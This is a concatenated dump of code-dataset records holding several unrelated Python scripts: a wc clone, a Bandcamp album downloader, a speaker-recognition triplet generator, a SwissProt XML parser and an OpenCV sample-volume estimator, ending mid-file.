8.22\\t\"\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t \"Copyright (C) 2018 Software Engineering\\t\"\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t \"Written by Jiabin Liu\")\nparser.add_argument('filenames', metavar='file', help='input files', nargs='*')\nargs = parser.parse_args() # 进行解析\n\n\ndef calculate_wc(file_file):\n\tline_count, word_count, char_count, byte_count, max_line_length = 0, 0, 0, 0, 0\n\tfor count, line in enumerate(file_file):\n\t\tline_count += line.count(b'\\n') # calculate lines\n\n\t\ta = line.split() # calculate words\n\t\tword_count += len(a)\n\n\t\tline1 = line.decode('utf-8', 'ignore') # calculate chars\n\t\tchar_count += len(line1)\n\n\t\tbyte_count += len(line) # calculate bytes\n\n\t\tlength = len(line) # calculate max lines length\n\t\tutf8_length = len(line.decode('utf-8', 'ignore'))\n\t\treal_length = (utf8_length - length) / 2 + length\n\t\tmax_line_length = max(max_line_length, real_length)\n\tcalculate_dict = (line_count, word_count, char_count, byte_count, max_line_length)\n\treturn calculate_dict\n\n\ndef file_wc(filename):\n\tcalculate_file_wc = ()\n\ttry:\n\t\tdata = open(filename, 'rb')\n\t\tcalculate_file_wc = calculate_wc(data)\n\texcept IOError as e:\n\t\tprint(' No such file or directory', e)\n\tcalculate_file_wc_new = (calculate_file_wc, filename)\n\treturn calculate_file_wc_new\n\n\ndef sum_std_in(std_content): # tuple 还是 tuple\n\tdata__dict = []\n\tfor content in std_content:\n\t\tdata__dict.append(content.encode('utf-8'))\n\tcalculate_sum_std_in = calculate_wc(data__dict)\n\treturn calculate_sum_std_in\n\n\ndef each_file_result(flaglists, wc_result, circulation_filename): # calculate wc of each file\n\treal_result = ''\n\tif len(wc_result) == 0:\n\t\treal_result = \"We don't handle that situation yet!\"\n\telif len(wc_result) == 1:\n\t\treal_result = wc_result[0]\n\telse:\n\t\tif 'l' in flaglists:\n\t\t\treal_result += ('\\t%i' % wc_result[0])\n\t\tif 'w' in flaglists:\n\t\t\treal_result += ('\\t%i' % wc_result[1])\n\t\tif 'm' in flaglists:\n\t\t\treal_result += ('\\t%i' % wc_result[2])\n\t\tif 'c' in flaglists:\n\t\t\treal_result += ('\\t%i' % wc_result[3])\n\t\tif 'L' in flaglists:\n\t\t\treal_result += ('\\t%i' % wc_result[4])\n\t\tif circulation_filename or len(wc_result) == 5:\n\t\t\treal_result += ('\\t%s' % circulation_filename)\n\t\telif not circulation_filename: # to show the 'total'\n\t\t\treal_result += ('\\t%s' % wc_result[5])\n\treturn real_result\n\n\ndef wc_wc(flaglists, file_names): # show the final result for the filename of input\n\ttotal_lines, total_words, total_bytes, total_chars, most_max = 0, 0, 0, 0, 0\n\n\tfor filename in file_names:\n\t\twc_result = file_wc(filename) # ((line_count, word_count, char_count, byte_count, max_line_length),filename)\n\t\tprint(each_file_result(flaglists, wc_result[0], filename))\n\n\t\t# calculate total\n\t\tif len(wc_result[0]) > 1:\n\t\t\ttotal_lines += wc_result[0][0]\n\t\t\ttotal_words += wc_result[0][1]\n\t\t\ttotal_bytes += wc_result[0][2]\n\t\t\ttotal_chars += wc_result[0][3]\n\t\t\tif wc_result[0][4] > most_max:\n\t\t\t\tmost_max = wc_result[0][4]\n\n\t# print total\n\tif len(file_names) > 1:\n\t\tprint(each_file_result(flaglists, (total_lines, total_words, total_bytes, total_chars, most_max, \"total\"), ''))\n\n\ndef wc_wc_std_in(flaglists, file_names): # for the std_in\n\twc_result = sum_std_in(file_names)\n\tprint(each_file_result(flaglists, wc_result, ''))\n\n\ndef filter_check_flags(args_resolve):\n\targs_dict = args_resolve.__dict__\n\tflag_lists = []\n\tfor key, value in args_dict.items():\n\t\tif value is True:\n\t\t\tflag_lists.append(key)\n\tif not flag_lists:\n\t\tflag_lists_initial = ['l', 'w', 'c']\n\t\treturn flag_lists_initial\n\telse:\n\t\treturn flag_lists\n\n\ndef files0_from_extract_from_read_std_in(std_in_contents): # read from --files0-from= std_in\n\tfilename_list = []\n\tif '\\0' not in std_in_contents:\n\t\tprint(std_in_contents)\n\t\tfilename_list = ['-']\n\telse:\n\t\tcontent_list_null = std_in_contents.split('\\0')\n\t\tfor iii in content_list_null:\n\t\t\treal_filename = iii.strip()\n\t\t\tif len(real_filename) > 0:\n\t\t\t\tfilename_list.append(real_filename)\n\treturn filename_list\n\n\ndef files0_from_extract_from_file(command_file): # read from --files0-from= file\n\twith open(command_file) as f:\n\t\tdata = f.read()\n\t\tfile_namelist = files0_from_extract_from_read_std_in(data)\n\treturn file_namelist\n\n\nif __name__ == '__main__':\n\tdict_new = vars(args)\n\t# print(dict_new) # show real args\n\t# print(dict_new['filenames'] == ['-'])\n\t# print(flags_filter(args))\n\t# pre_args = parser.parse_args(pre_process_sys_argv())\n\n\tif args.filenames and args.filelist:\n\t\tprint('file operands cannot be combined with --files0-from')\n\n\telif args.filenames:\n\t\ttry:\n\t\t\t\twc_wc(filter_check_flags(args), args.filenames)\n\t\texcept IOError as e: # IOError失败\n\t\t\tprint('wc.py' + args.filenames + ': No such file or directory')\n\n\telif args.filelist:\n\t\ttry:\n\t\t\tnew_list = args.filelist\n\t\t\tfile_names_new = []\n\t\t\tif len(new_list) == 1 and len(new_list) == new_list.count('-'): # 从 --files0-from=- 标准输入读取\n\t\t\t\tinput_content = sys.stdin.read()\n\t\t\t\tfile_names_new = files0_from_extract_from_read_std_in(input_content)\n\n\t\t\telse:\n\t\t\t\tfile_names_new = files0_from_extract_from_file(new_list[0]) # 从 --files0-from= 文件名读取\n\t\t\twc_wc(filter_check_flags(args), file_names_new)\n\t\texcept IOError as e:\n\t\t\terror_name = \"\".join(args.filelist)\n\t\t\tprint('wc.py: cannot open \\'' + error_name + '\\' for reading: No such file or directory')\n\n\telif len(dict_new['filenames']) == 0 or dict_new['filenames'] == ['-']: # python wc.py - 报错\n\t\tstandard_input_content = sys.stdin.readlines() # 从标准输入读取 计算wc\n\t\tif filter_check_flags(args) == ['l', 'w', 'c']:\n\t\t\twc_wc_std_in(filter_check_flags(args), standard_input_content)\n\t\telse:\n\t\t\tprint(each_file_result(filter_check_flags(args), sum_std_in(standard_input_content), ''))\n", "sub_path": "wc.py", "file_name": "wc.py", "file_ext": "py", "file_size_in_byte": 6525, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.stdin.read", "line_number": 171, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 171, "usage_type": "attribute"}, {"api_name": "sys.stdin.readlines", "line_number": 182, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 182, "usage_type": "attribute"}]} +{"seq_id": "623948286", "text": "import requests\nimport sys\n\nimport os\nimport re\nimport json\nimport mutagen\nfrom threading import Thread\n\nfrom mutagen.mp3 import MP3\nfrom mutagen.id3 import APIC, ID3, TALB\nfrom mutagen.easyid3 import EasyID3\n\ndef add_tags(folder, title, artist, image, album):\n song = MP3(\"{}/{}.mp3\".format(folder, title.replace(' ','-')))\n\n try:\n song.add_tags()\n except mutagen.id3._util.error:\n pass\n\n song.tags.add(\n APIC(\n encoding=3,\n mine='image/jpeg',\n type=3,\n desc=u\"\",\n data=requests.get(image).content\n )\n )\n song.save()\n song = EasyID3(\"{}/{}.mp3\".format(folder, title.replace(' ', '-')))\n song['title'] = title\n song['artist'] = artist\n song.save()\n\ndef download(title, link, folder, image, artist):\n print(\"Downloading {} by {}.\".format(title, artist))\n with open(\"{}/{}.mp3\".format(folder, title.replace(' ','-')), 'wb') as song:\n song.write(requests.get(link, headers={'Accept-Encoding': None}).content)\n\n add_tags(folder, title, artist, image, folder)\n print(\"Finished downloading {} by {}.\".format(title, artist))\n\n\ndef main(url):\n by = url.split(\"/\")[0]\n album = url.split(\"/\")[1]\n folder_name = \"{} - {}\".format(by, album)\n if not os.path.exists(folder_name):\n os.makedirs(folder_name)\n url = \"https://{}.bandcamp.com/album/{}\".format(by, album)\n data = requests.get(url, headers={\"Cache-Control\": \"max-age=0\"})\n st = str(data.content).split('trackinfo : ')[1].split(']')[0] + \"]\"\n st = re.sub(\"\\\\\\\\\", \"\\/\", st)\n artist = str(data.content).split('\\\"byArtist\\\">')[1].split(\"\")[0].split(\">\")[1]\n image_url = str(data.content).split(\"artFullsizeUrl: \\\"\")[1].split(\"\\\",\")[0]\n\n for x in json.loads(st):\n try:\n title = x['title']\n url = x['file']['mp3-128']\n title = re.sub(r\"[^A-z0-9- ]\",\"\", title)\n Thread(target=download, args=(title, url, folder_name, image_url, artist)).start().join()\n except AttributeError:\n pass\n except TypeError:\n pass\n\n\nif __name__ == '__main__':\n main(sys.argv[1])", "sub_path": "b.py", "file_name": "b.py", "file_ext": "py", "file_size_in_byte": 2005, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "mutagen.mp3.MP3", "line_number": 15, "usage_type": "call"}, {"api_name": "mutagen.id3", "line_number": 19, "usage_type": "attribute"}, {"api_name": "mutagen.id3.APIC", "line_number": 23, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 28, "usage_type": "call"}, {"api_name": "mutagen.easyid3.EasyID3", "line_number": 32, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 51, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 53, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 55, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 59, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 63, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 64, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 72, "usage_type": "attribute"}]} +{"seq_id": "328248227", "text": "from toy_2d import *\nfrom train_resnet_test_small import get_class_num\nimport os\nimport torch\nfrom torch.autograd import Variable\nimport numpy as np\nimport pickle\nimport pdb\nfrom scipy.spatial.distance import cosine\nimport random\n\n\ndef to_variable(tensor):\n # Tensor -> Variable (on GPU if possible)\n if torch.cuda.is_available():\n # Tensor -> GPU Tensor\n tensor = tensor.cuda()\n return Variable(tensor)\n\n\n# class ClassificationDataset(Dataset):\n# def __init__(self, dir, train_file, dev_file, person2label_map):\n# self.dir = dir\n# self.data_files = []\n# with open(train_file) as f:\n# self.data_files.extend(f.readlines())\n# with open(dev_file) as f:\n# self.data_files.extend(f.readlines())\n#\n# with open(person2label_map, 'rb') as handle:\n# self.label_dict = pickle.load(handle)\n#\n# self.total_labels = len(self.label_dict)\n#\n# def __getitem__(self, item):\n# # Get training data\n# filename = self.data_files[item].strip()\n# X = np.load(self.dir + filename)\n#\n# # Build data label one-hot vector\n# person = filename.split(\"-\")[0]\n# idx = np.array([self.label_dict[person]])\n# # Y = np.zeros([self.total_labels], dtype=float)\n# # Y[idx] = 1\n#\n# return filename, to_tensor(X), to_tensor(idx)\n#\n# def __len__(self):\n# return len(self.data_files)\n\n\nclass ClassificationDataset(Dataset):\n def __init__(self, dir, train_file, person2label_map):\n self.dir = dir\n self.data_files = []\n with open(train_file) as f:\n self.data_files.extend(f.readlines())\n\n with open(person2label_map, 'rb') as handle:\n self.label_dict = pickle.load(handle)\n\n self.total_labels = len(self.label_dict)\n\n def __getitem__(self, item):\n # Get training data\n filename = self.data_files[item].strip()\n X = np.load(self.dir + filename)\n\n # Build data label one-hot vector\n person = filename.split(\"-\")[0]\n idx = np.array([self.label_dict[person]])\n # Y = np.zeros([self.total_labels], dtype=float)\n # Y[idx] = 1\n\n return filename, to_tensor(X), to_tensor(idx)\n\n def __len__(self):\n return len(self.data_files)\n\n\nclass MyAllDataset(Dataset):\n def __init__(self, dir, all_file):\n self.dir = dir\n self.data_files = []\n with open(all_file, \"r\") as f:\n self.data_files.extend(f.readlines())\n\n def __getitem__(self, item):\n # Get training data\n filename = self.data_files[item].strip().split()[-1]\n X = np.load(self.dir + filename)\n\n return filename, to_tensor(X)\n\n def __len__(self):\n return len(self.data_files)\n\n\ndef classify_all(num_classes):\n batch_size = 128\n cls_dir = \"./vectors/\"\n all_file = \"all.txt\"\n\n # Load dataset\n dir = \"./new_features_2000/\" # directory of single training instances\n my_dataset = MyAllDataset(dir, all_file)\n dataloader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, shuffle=False)\n\n # Load Model\n model_path = \"./best_state_toy\"\n model = DeepSpeakerModel(num_classes)\n model.load_state_dict(torch.load(model_path, map_location=lambda storage, loc: storage))\n model.eval()\n\n if torch.cuda.is_available():\n # Move the network and the optimizer to the GPU\n model = model.cuda()\n for (filenames, input_val) in dataloader:\n prediction, feats = model(to_variable(input_val))\n feats = feats.data.cpu().numpy()\n\n for i in range(len(filenames)):\n filename = filenames[i]\n np.save(cls_dir + filename[:-4], np.expand_dims(feats[i], 0)) # Save feature vector for current data\n\n\ndef find_misclassify(num_classes):\n batch_size = 128\n wrong_pred_file = \"wrong_classification.pickle\"\n person2label_map = \"person2label_map.pickle\"\n train_file = \"train.txt\"\n # dev_file = \"dev3.txt\"\n cls_dir = \"./vectors/\"\n misclassied = {}\n\n # Load dataset\n dir = \"./new_features_2000/\" # directory of single training instances\n classification_dataset = ClassificationDataset(dir, train_file, person2label_map)\n dataloader = torch.utils.data.DataLoader(classification_dataset, batch_size=batch_size, shuffle=False)\n\n # Load Model\n # model_path = \"./best_state\"\n # model = DeepSpeakerModel(num_classes)\n # model.load_state_dict(torch.load(model_path, map_location=lambda storage, loc: storage))\n # model.eval()\n #\n # if torch.cuda.is_available():\n # # Move the network and the optimizer to the GPU\n # model = model.cuda()\n\n for (filenames, input_val, labels) in dataloader:\n # predictions, feats = model(to_variable(input_val))\n # predictions = torch.max(predictions, dim=1)[1].cpu().data.numpy()\n labels = labels.numpy()\n\n for i in range(len(filenames)):\n filename = filenames[i]\n label = labels[i][0]\n # prediction = predictions[i]\n prediction = np.load(cls_dir + filename)\n prediction = prediction.argmax(axis=1)[0]\n\n person = filename.split(\"-\")[0]\n\n if int(prediction) != int(label):\n if person not in misclassied:\n misclassied[person] = {}\n\n misclassied[person][filename] = (prediction, int(label))\n\n with open(wrong_pred_file, 'wb') as handle:\n pickle.dump(misclassied, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n\ndef get_misclassified_triplets(misclassified):\n triplets = []\n label2person_map = \"label2person_map.pickle\"\n with open(label2person_map, 'rb') as handle:\n label2person = pickle.load(handle)\n\n # Build a dictionary storing each person's files\n vector_dir = \"./vectors/\"\n file_dict = {}\n files = os.listdir(vector_dir)\n added_triplets = set([])\n for filename in files:\n person = filename.split(\"-\")[0]\n if person not in file_dict:\n file_dict[person] = []\n file_dict[person].append(filename)\n\n # Iterate all wrongly classified files\n for person in misclassified:\n for anchor_file in misclassified[person]:\n anchor = anchor_file.split(\"-\")[0]\n anchor_vec = np.load(vector_dir + anchor_file)\n\n negative_person = label2person[misclassified[person][anchor_file][0]]\n d_a_n = {}\n for negative_file in file_dict[negative_person]:\n # Distance between Anchor and Negative\n d_a_n[negative_file] = cosine(anchor_vec, np.load(vector_dir + negative_file))\n\n # Iterate all positive files for the same person\n for positive_file in file_dict[anchor]:\n if positive_file == anchor_file:\n continue\n\n # Cosine distance (1 - similarity) between Anchor and Positive\n d_a_p = cosine(anchor_vec, np.load(vector_dir + positive_file))\n\n for negative_file in d_a_n:\n # Compare Distance. If condition satisfied, add the triplet.\n if d_a_n[negative_file] <= d_a_p:\n triplets.append((anchor_file, positive_file, negative_file))\n temp = anchor_file + \"#\" + positive_file + \"#\" + negative_file\n added_triplets.add(temp)\n\n return triplets, added_triplets\n\n\ndef get_general_triplets(added_triplets):\n all_file_path = \"all.txt\"\n vector_dir = \"./vectors/\"\n triplets = []\n persons = {}\n\n with open(all_file_path, \"r\") as f:\n all_files = f.readlines()\n for each_file in all_files:\n each_file = each_file.strip().split()[-1]\n person = each_file.split(\"-\")[0]\n if person not in persons:\n persons[person] = []\n persons[person].append(each_file)\n\n for person in persons:\n # Choose current person as the anchor person\n files = persons[person]\n # Skip if this person only has one file\n if len(files) < 2:\n continue\n\n for i in range(len(files) - 1):\n anchor_file = files[i]\n anchor_vec = np.load(vector_dir + anchor_file)\n # Randomly choose a positive file\n positive_file = files[random.randint(i + 1, len(files) - 1)]\n positive_vec = np.load(vector_dir + positive_file)\n\n d_a_p = cosine(anchor_vec, positive_vec)\n\n # For rest of other persons, choose one for each as negative files\n samples = random.sample(list(persons), 40) # Around 15000 files\n for diff_person in samples:\n if diff_person == person:\n continue\n\n diff_files = persons[diff_person]\n negative_file = diff_files[random.randint(0, len(diff_files) - 1)]\n\n temp = anchor_file + \"#\" + positive_file + \"#\" + negative_file\n if temp in added_triplets:\n continue\n added_triplets.add(temp)\n\n negative_vec = np.load(vector_dir + negative_file)\n d_a_n = cosine(anchor_vec, negative_vec)\n if d_a_n <= d_a_p:\n triplets.append((anchor_file, positive_file, negative_file))\n\n return triplets\n\n\nif __name__ == \"__main__\":\n # classes = get_class_num()\n classes = 2382\n # classify_all(classes)\n print(\"Finished classifying!\")\n\n # find_misclassify(classes)\n print(\"Finished finding mis-classification!\")\n with open(\"wrong_classification.pickle\", \"rb\") as handle:\n misclassified = pickle.load(handle)\n\n triplets, added_triplets = get_misclassified_triplets(misclassified)\n print(\"Finished generating misclassified triplets!\")\n\n # Write all triplets to a file\n output_file = open(\"triplets_misclassified.csv\", 'w')\n for triplet in triplets:\n output_file.write(triplet[0] + \",\" + triplet[1] + \",\" + triplet[2] + \"\\n\")\n output_file.close()\n\n # Randomly sample triplets\n triplets = random.choices(triplets, k=int(0.03 * len(triplets)))\n\n general_triplets = get_general_triplets(added_triplets)\n\n # Write all triplets to a file\n output_file = open(\"triplets_general.csv\", 'w')\n for triplet in general_triplets:\n output_file.write(triplet[0] + \",\" + triplet[1] + \",\" + triplet[2] + \"\\n\")\n output_file.close()\n\n # Randomly sample triplets\n # general_triplets = random.choices(general_triplets, k=int(0.2 * len(general_triplets)))\n\n triplets.extend(general_triplets)\n # Write all triplets to a file\n output_file = open(\"triplets.csv\", 'w')\n for triplet in triplets:\n output_file.write(triplet[0] + \",\" + triplet[1] + \",\" + triplet[2] + \"\\n\")\n output_file.close()\n print(\"All done!\")\n", "sub_path": "get_triplets_general.py", "file_name": "get_triplets_general.py", "file_ext": "py", "file_size_in_byte": 10850, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "torch.cuda.is_available", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 18, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 107, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 115, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 139, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 160, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 172, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 172, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 179, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 196, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cosine", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 202, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cosine", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 246, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 249, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cosine", "line_number": 251, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 254, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 260, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 267, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cosine", "line_number": 268, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 284, "usage_type": "call"}, {"api_name": "random.choices", "line_number": 296, "usage_type": "call"}]} +{"seq_id": "141366734", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nIMPORTANT!:\nBefore writing an email asking questions such as\n'What does this input has to be like?' or\n'What return value do you expect?' PLEASE read our\nexercise sheet and the information in this template\ncarefully.\nIf something is still unclear, PLEASE talk to your\ncolleagues before writing an email!\n\nIf you experience technical issues or if you find a\nbug we are happy to answer your questions. However,\nin order to provide quick help in such cases we need\nto avoid unnecessary emails such as the examples\nshown above.\n\"\"\"\n\nfrom Bio import SeqIO # Tip: This module might be useful for parsing...\n\n############ Exercise 3: SwissProt ##########\nclass SwissProt_Parser:\n\n PARSER = SeqIO\n\n def __init__( self, path, frmt='uniprot-xml' ):\n '''\n Initialize every SwissProt_Parser with a path to a XML-formatted UniProt file.\n An example file is included in the repository (P09616.xml).\n Tip: Store the parsed XML entry in an object variable instead of parsing it\n again & again ...\n '''\n\n self.sp_id = None\n self.sp_name = None\n self.sp_sequence_length = None\n self.sp_organism = None\n self.sp_subcellularlocation_location = None\n self.sp_pdb_support = []\n\n self.sp_anno = SeqIO.parse(path, frmt) # Parse the XML file once and re-use it in the functions below\n for s in self.sp_anno:\n #print(s)\n\n self.sp_id = s.id\n self.sp_name = s.name\n self.sp_sequence_length = len(s.seq)\n self.sp_organism = s.annotations['organism']\n self.sp_subcellularlocation_location = s.annotations['comment_subcellularlocation_location']\n dbxrefs = s.dbxrefs\n for dbxref in dbxrefs:\n if 'PDB:' in dbxref:\n self.sp_pdb_support.append(dbxref[4:])\n\n\n\n # 3.2 SwissProt Identifiers\n def get_sp_identifier( self ):\n '''\n Input: \n self: Use XML entry which has been parsed & saved during object initialization \n Return:\n Unique SwissProt identifier for the given xml file\n '''\n \n identifier = self.sp_id\n return identifier\n\n def get_sp_name(self):\n identifier = self.sp_name\n return identifier\n \n # 3.3 SwissProt Sequence length\n def get_sp_sequence_length( self ):\n '''\n Input: \n self: Use XML entry which has been parsed & saved during object initialization \n Return:\n Return sequence length of the UniProt entry as an integer.\n '''\n \n seq_len = self.sp_sequence_length\n return seq_len\n \n # 3.4 Organism \n def get_organism( self ):\n '''\n Input: \n self: Use XML entry which has been parsed & saved during object initialization \n Return:\n Return the name of the organsim as stated in the corresponding field\n of the XML data. Return value has to be a string.\n '''\n \n organism = self.sp_organism\n return organism\n \n # 3.5 Localizations\n def get_localization( self ):\n '''\n Input: \n self: Use XML entry which has been parsed & saved during object initialization \n Return:\n Return the name of the subcellular localization as stated in the \n corresponding field.\n Return value has to be a list of strings.\n '''\n \n localization = self.sp_subcellularlocation_location\n return localization\n \n # 3.6 Cross-references to PDB\n def get_pdb_support( self ):\n '''\n Input: \n self: Use XML entry which has been parsed & saved during object initialization \n Return:\n Returns a list of all PDB IDs which support the annotation of the\n given SwissProt XML file. Return the PDB IDs as list.\n '''\n \n pdb_ids = self.sp_pdb_support\n return pdb_ids\n \ndef main():\n print('SwissProt XML Parser class')\n parser = SwissProt_Parser('./tests/P09616.xml')\n print(\"id: {0}, name: {1}, length: {2}, organism: {3}, locations: {4}, dbxrefs: {5}\".format(parser.get_sp_identifier(), parser.get_sp_name(), parser.get_sp_sequence_length(), parser.get_organism(), parser.get_localization(), parser.get_pdb_support()))\n return None\n \nif __name__ == '__main__':\n main()\n", "sub_path": "codechecker/repos/2/collected_files/exe2_swissprot/ga56jat.py", "file_name": "ga56jat.py", "file_ext": "py", "file_size_in_byte": 4552, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "Bio.SeqIO", "line_number": 24, "usage_type": "name"}, {"api_name": "Bio.SeqIO.parse", "line_number": 41, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 41, "usage_type": "name"}]} +{"seq_id": "57606982", "text": "#!/usr/bin/env python27\n\"\"\"\nTested with python 2.7.9\n\"\"\"\n\nimport numpy as np\nimport argparse\nimport cv2\n\n\nclass Sample:\n\n \"\"\"\n Sample class used to parse image of sample located by RPiBoard class\n \"\"\"\n def __init__(self, image):\n # load the image\n # initialize variables so assertions don't throw exceptions\n self.image = cv2.imread(image)\n self.coord = []\n self.shaped_image = []\n\n def ToTuple(self, coord):\n \"\"\"\n To find the upper left and bottom right corner of the rectangle to be\n drawn around the found sample, a tuple of the x,y coordinates needs to\n be given from the given coord array.\n \"\"\"\n try:\n return tuple(self.ToTuple(i) for i in coord)\n except TypeError:\n return coord\n\n def findVolume(self):\n \"\"\"\n Finds the volume by filtering the imported image for a range of reds,\n masking the original image, finding the difference between the top and\n bottom of the red found in the image, and multiplies the pixel\n difference by a constant found through testing to match the z height to\n volume of sample\n \"\"\"\n # resize the image to something more managable\n small_image = cv2.resize(self.image, (0, 0), fx=0.5, fy=0.5)\n\n # cropping the image to ensure that the mask is correctly identifying\n # the blood vial\n cropped_image = small_image[200:500, 25:800]\n\n # rotate the cropped image\n self.shaped_image = cv2.transpose(cropped_image)\n self.shaped_image = cv2.flip(self.shaped_image, 0)\n\n # define the pixel boundaries defining \"red\" in the image\n lower = np.array([10, 10, 50], dtype=\"uint8\")\n upper = np.array([50, 50, 255], dtype=\"uint8\")\n\n # find the colors within the specified boundaries and apply\n # the mask\n mask = cv2.inRange(self.shaped_image, lower, upper)\n self.coord = cv2.findNonZero(mask)\n\n try:\n # setting up values for drawing rectangle over sample tube\n upper_left_corner = self.ToTuple(self.coord[0][0])\n\n # need to double value of lower right hand corner as the last value\n # is located at the vertex of the concave sample tube\n lower_right_corner = self.ToTuple(self.coord[-1][0])\n lower_right_corner = (int(lower_right_corner[0] * 1.75),\n lower_right_corner[1])\n\n self.volume = (lower_right_corner[1] - upper_left_corner[1])*0.0078\n except TypeError as e:\n print(\"Image given did not have a sample detected in the cropped\" +\n \" image. Ensure that a sample is in the holder, the \" +\n \"light stack is functioning properly, and retry.\")\n self.volume = 0.0\n except Exception as e:\n print(\"Error occured trying to find sample volume. See below for\" +\n \" details.\\n======================\\n\" + str(e))\n self.volume = 0.0\n\n def showVolumeImage(self, see_image):\n \"\"\"\n Presents the final image of the found sample area to the user.\n Rectangle drawn is multiplied by 1.75 as the final coordinate given by\n the red mask is at the vertex of the sample vial, rather than the\n opposite side of the starting coordinate\n \"\"\"\n # check to make sure that the volume was found first\n # if not, go ahead and run the findVolume(self) method\n if self.coord == []:\n self.findVolume()\n # setting up values for drawing rectangle over sample tube\n upper_left_corner = self.ToTuple(self.coord[0][0])\n\n # need to double value of lower right hand corner as the last value\n # is located at the vertex of the concave sample tube\n lower_right_corner = self.ToTuple(self.coord[-1][0])\n lower_right_corner = (int(lower_right_corner[0] * 1.75),\n lower_right_corner[1])\n\n # add the rectangle to the shaped image\n cv2.rectangle(self.shaped_image, upper_left_corner,\n lower_right_corner, [255, 0, 0], 2)\n\n # add the volume test to the upper left hand corner of the shaped image\n cv2.putText(self.shaped_image, \"%.1f\" % round(self.volume, 1),\n (20, 40), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0), 2)\n\n if see_image:\n # show the images\n cv2.imshow(\"images\", self.shaped_image)\n cv2.waitKey()\n\n\nif __name__ == \"__main__\":\n # construct the argument parse and parse the arguments\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-i\", \"--image\", help=\"path to the image\")\n args = vars(ap.parse_args())\n # main(args[\"image\"])\n sample = Sample(args[\"image\"])\n sample.findVolume()\n sample.showVolumeImage()\n", "sub_path": "Sample.py", "file_name": "Sample.py", "file_ext": "py", "file_size_in_byte": 4879, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "cv2.imread", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.transpose", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 55, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.findNonZero", "line_number": 60, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 104, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 108, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 109, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 113, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 114, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "195036995", "text": "from wagtail.contrib.modeladmin.options import(\n\n ModelAdmin,\n modeladmin_register,\n 